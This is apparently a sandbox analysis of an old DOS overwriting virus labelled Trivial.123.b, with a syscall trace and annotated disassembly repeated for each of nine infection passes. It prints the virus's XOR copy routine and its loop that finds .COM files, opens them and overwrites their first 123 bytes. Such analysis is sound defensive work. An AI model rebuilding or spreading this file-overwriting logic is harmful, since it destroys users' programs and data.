Sample viewer

vx.netlux.org/Virus.DOS.Trivial.123.b


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:24.172847716Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the first pass. Its first instruction is printed on the
; trace row above (0x12a59): DL is saved to [0x109] right after the call logged
; as "Get time" (op 44 = 0x2C; DOS returns hundredths of a second in DL), so the
; XOR key used below presumably differs from pass to pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find first file" in this pass. CX = 0 and DX = 0x175
; are its arguments (attribute mask and, presumably, the file-spec pointer).
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'SLEEP.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.176050122Z 78 PC: 12a7a | Find first file
2018-12-17T22:54:24.183020935Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:24.191031983Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.198411204Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.201926778Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.217279476Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the second pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'PRINT.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.220192277Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.224242044Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:54:24.231498465Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.239301722Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.247423689Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.257002631Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the third pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'HELLO.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.259608937Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.265151759Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:54:24.272577587Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.279775738Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.283943306Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.292844526Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the fourth pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'PHANG.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.295502128Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.298800895Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:54:24.306713157Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.314195472Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.317440627Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.32757849Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the fifth pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'PRINTA~1.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.331394358Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.334648921Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:54:24.34387452Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.360733779Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.364134737Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.374170798Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the sixth pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'MANDEL.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.37678583Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.380132056Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:54:24.388467373Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.396809062Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.400069917Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.409975453Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the seventh pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'PAH.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.413398102Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.416589056Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:54:24.423781146Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.432457653Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.435757562Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.44458329Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the eighth pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E); the trace shows
; 'TEST.COM' being opened here.
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here; the trace then
; logs writes of 18 and 105 bytes (123 in total) and a close, with no seek in
; between, so the writes presumably land at the start of the opened file and
; replace its original bytes.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.448391844Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.451843076Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:54:24.459160762Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.464051729Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.4672894Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.475978903Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly excerpt for the final pass (same code as every pass). Its first
; instruction is printed on the trace row above (0x12a59): DL is saved to
; [0x109] right after the call logged as "Get time" (op 44 = 0x2C; DOS returns
; hundredths of a second in DL), so the XOR key presumably differs per pass.
; SI = source offset, DI = destination offset, CX = 0x69 (105, the size of the
; second write logged for each opened file on earlier passes).
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
; Single-byte XOR copy: load from [SI], XOR with the key byte at [0x109], store
; to ES:[DI]. SI/DI step forward assuming the direction flag is clear (it is not
; set in this excerpt). The encoding is reversible from the key byte alone.
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
; The loop ends when CX reaches -1, not 0, so it runs 0x69 + 1 = 106 times:
; one byte more than the 105-byte write.
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
; AX is restored from a push made outside this excerpt; the trace logs the
; int 0x21 at 0x12a78 as "Find next file" in this pass. CX = 0 and DX = 0x175
; are set the same way as on the first pass.
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
; Carry set means the search failed: leave the loop via 0x12aa3. In this pass
; the trace shows no open after the search, only "Display string" ('T-1000')
; at PC 12aac, so the branch was presumably taken and the lines below did not run.
0x12a7a: jb 0x12aa3
; AX = 0x3d01: DOS open (AH=3Dh) with AL=01, write-only access. DX = 0x9e is
; presumably the found name in the default DTA (0x80 + 0x1E).
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
; The open result goes straight into BX as the handle; carry is not tested
; first. AH = 0x40 selects DOS write. The excerpt stops here.
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.479199492Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.48232865Z 9 PC: 12aac | Display string (String= 'T-1000')